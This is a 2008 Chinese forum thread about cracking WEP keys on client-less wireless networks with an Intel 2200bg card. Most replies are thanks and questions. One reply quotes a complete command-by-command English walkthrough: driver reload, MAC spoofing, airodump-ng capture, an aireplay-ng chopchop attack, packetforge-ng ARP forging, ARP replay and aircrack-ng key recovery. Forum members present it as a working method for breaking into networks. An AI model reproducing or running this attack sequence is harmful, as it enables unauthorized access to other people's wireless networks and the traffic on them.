ubnt解决方案
楼主: liyg

INTEL 2200bg实现注入式破解无客户端wep

[复制链接]

8

回帖

102

积分

1 小时

在线时间

上等兵

注册时间
2008-4-9
金币
92 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-5-19 21:58 |显示全部楼层
晕。回复了也看不到啊
回复

使用道具 举报

23

回帖

105

积分

21 小时

在线时间

上等兵

注册时间
2008-5-18
金币
74 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-5-19 22:08 |显示全部楼层
新手学习下。。。。。
回复

使用道具 举报

363

回帖

587

积分

89 小时

在线时间

中尉

注册时间
2007-12-10
金币
113 个
威望
1 个
荣誉
0 个
累计签到:3 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2008-5-19 22:15 |显示全部楼层

回复了,先看看内容。

回复

使用道具 举报

6

回帖

56

积分

3 小时

在线时间

新兵上阵

注册时间
2007-7-7
金币
50 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-5-19 22:24 |显示全部楼层
写的不错..............
回复

使用道具 举报

5

回帖

29

积分

0 小时

在线时间

新兵上阵

注册时间
2008-5-18
金币
24 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-5-19 22:37 |显示全部楼层
uouououpoupou
回复

使用道具 举报

52

回帖

343

积分

29 小时

在线时间

少尉

注册时间
2006-8-13
金币
285 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-5-20 02:13 |显示全部楼层
ddddddddddddddddddddddddddd
回复

使用道具 举报

700

回帖

1万

积分

107 小时

在线时间

VIP

终身荣誉会员终身荣誉版主

注册时间
2007-12-8
金币
11440 个
威望
28 个
荣誉
0 个

尚未签到

发表于 2008-5-20 08:30 |显示全部楼层
必要的回复还是需要的!不过必要的东西都已经出来了!
回复

使用道具 举报

363

回帖

587

积分

89 小时

在线时间

中尉

注册时间
2007-12-10
金币
113 个
威望
1 个
荣誉
0 个
累计签到:3 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2008-5-20 08:35 |显示全部楼层

lily兄的文章总是有那么多期待,为2200用户带来了福音,更为本论坛带来了福音。

有个问题一直纳闷:一直以为无客户端的破解就一定要-1的虚拟连接,但是本文没有却也能注入。因此想了解-4这个模式具体是什么?是不是这个命令本身就包含了和AP之间建立一个连接?

命令中rtap0是一个用于监听的接口,而eth1是一个控制接口是不是这样理解?

根据aireplay-ng 的-i参数:指定从rtap0网卡中获取数据

心情不错啊!
回复

使用道具 举报

32

回帖

106

积分

7 小时

在线时间

上等兵

注册时间
2008-5-19
金币
73 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-5-20 09:04 |显示全部楼层
[em05][em05][em05]非常需要 感谢楼主
回复

使用道具 举报

363

回帖

587

积分

89 小时

在线时间

中尉

注册时间
2007-12-10
金币
113 个
威望
1 个
荣誉
0 个
累计签到:3 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2008-5-20 09:08 |显示全部楼层

We will also need to know the target's name (ESSID), MAC address, and the channel. Please note that my wireless device is "eth1" but yours may be different; use "iwconfig" to find out which adaptor is wireless. (If you downloaded aircrack-ng you may need to reset your network adaptor)
iwlist eth1 scan

Now we can get started. First we must enable rtap0 for listening. rtap0 is required (instead of just eth1) due to limitations in the ipw2200 driver.
rmmod ipw2200
modprobe ipw2200 rtap_iface=1

Next enable wireless and change MAC (changing MAC is optional).
ifconfig eth1 up hw ether 00:11:22:33:44:55

Configure wireless w/ essid, channel, and a fake key.
iwconfig eth1 essid <ESSID> channel <#> key s:fakekey mode managed

Now start collecting traffic on rtap0. "dump" is the name of the capture (.cap) file.
airodump-ng --bssid <AP MAC> -w dump rtap0

Now for the actual injection. Open a new terminal (<ctrl><alt><F2> if you are still in the console) and start the aireplay chopchop attack. Note the modifier "-i rtap0." This tells aireplay to use rtap0 for listening and eth1 for injecting. Also "-4" is the type of attack (chopchop).
aireplay-ng -4 -a <AP MAC> -h 00:11:22:33:44:55 -i rtap0 eth1

A prompt will ask you to use "this" packet. Type "y" and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream(.xor) file. The keystream file will look something like "replay_dec-######.xor"

Make sure there are no errors reported after using aireplay. This is where I had the most difficulty. If the attack doesn't start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn't match. I just re-ran aireplay and it was fine.

Now we will create an arp-request packet using the aquired keysteam file. The "-l" and "-k" options are the source IP and destination IP. They can be any valid IP. The destination can be the gateway (router IP) but the attack run faster if it is an arbitrary IP.
packetforge-ng -0 -a <AP MAC> -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.101 -y replay_dec-####.xor -w arp-request

Finally we will send our newly created arp-request packet over and over. After this step you should see the "Data" begin to rise quickly back in the first terminal (airodump). If the data doesn't change (usually between 80 and 350 per second) then something is wrong.
aireplay-ng -2 -r arp-request eth1

Let aireplay run for a few minutes while you collect data. After 75,000 or so you can run aircrack in a third terminal (<ctrl><alt><F3>). Within a few minutes you should have the key.
aircrack-ng -z dump*.cap

谁把关键部分翻页一下,谢谢

心情不错啊!
回复

使用道具 举报

237

回帖

5114

积分

648 小时

在线时间

中校

注册时间
2008-4-16
金币
4802 个
威望
1 个
荣誉
0 个
累计签到:477 天
连续签到:0 天
[LV.730]常住居民
发表于 2008-5-20 09:27 |显示全部楼层

谢谢! 再学习!!

回复

使用道具 举报

22

回帖

167

积分

0 小时

在线时间

上等兵

注册时间
2008-5-17
金币
142 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-5-20 09:48 |显示全部楼层
这个要顶的 前面的那个方法到最后一步抓包能显示数据就是 ARP那个一直是 0 试试这个
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2025-1-21 12:03

返回顶部 返回列表